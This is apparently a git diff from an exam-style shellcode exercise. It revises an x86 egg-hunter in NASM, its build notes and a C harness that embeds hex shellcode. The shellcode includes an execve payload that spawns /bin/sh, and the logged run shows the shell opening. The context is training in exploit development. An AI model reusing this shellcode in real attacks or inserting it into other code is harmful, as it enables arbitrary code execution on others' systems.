minor updates

exam3/USAGE

@@ -10,8 +10,8 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm
 
 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
 
-exam3$ ./make.sh "egg.mark"
+exam3$ ./make.sh "egg.MaRk"
- [I] Using custom EGG mark: egg.mark
+ [I] Using custom EGG mark: egg.MaRk
  [+] Compiling payload.nasm ...
  [+] Compiling hunter.nasm ...
  [+] Extracting PAYLOAD code from payload ...
@@ -20,14 +20,13 @@ exam3$ ./make.sh "egg.mark"
  [+] Extracting HUNTER code from hunter ...
  [+] Checking HUNTER code for NULLs ...
  [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 16:47 ./shellcode
+-rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
  [+] All done!
 
 
 3. Run the shellcode
 
 exam3$ ./shellcode 
-Hunter Length:  29
+Hunter Length:  21
 Payload Length:  36
-sh-4.1$ exit
+sh-4.1$ 
-

exam3/hunter.nasm

@@ -28,11 +28,6 @@ global _start
 
 
 _start:
-	jmp short huntersEnd
-
-continue:
-	pop eax		; Now EAX points at hunters End
-
 	; Searching for the Egg marker
 next:
 	inc eax		; Searching forward  (can also try dec eax)
@@ -43,6 +38,3 @@ isEgg:
 	jne next
 
 	call eax			; Once found, we call our payload
-
-huntersEnd:
-	call continue

exam3/shellcode.c

@@ -1,11 +1,11 @@
 #include <stdio.h>
 #include <string.h>
 
-unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x6d\x61\x72\x6b\x75\xed\xff\xd0\xe8\xe5\xff\xff\xff";
+unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
 
 unsigned char garbage1[] = "Just some garbage here...";
 
-unsigned char payload[] = "\x65\x67\x67\x2e\x6d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
 
 unsigned char garbage2[] = "And some garbage there...";